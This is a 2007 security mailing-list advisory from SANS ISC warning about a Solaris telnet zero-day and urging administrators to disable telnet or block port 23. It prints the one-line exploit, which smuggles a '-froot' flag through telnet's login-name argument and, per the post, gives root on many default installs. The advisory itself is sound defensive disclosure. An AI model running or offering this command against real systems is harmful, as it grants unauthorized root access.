[Dshield] Solaris Telnet 0-day (Important!)

Johannes B. Ullrich jullrich at sans.org
Sun Feb 11 21:22:23 GMT 2007

If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial Solaris
telnet 0-day.

telnet -l "-froot" [hostname]

will give you root on many Solaris systems with default installs
We are still testing. Please use our contact form at
https://isc.sans.org/contact.html
if you have any details about the use of this exploit.

--
---------
Johannes Ullrich                        http://isc.sans.org

SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
taught by our top rated instructors plus a huge vendor tools expo.
	Register Today! <http://www.sans.org/info/2501>
(Brochurecode: ISC)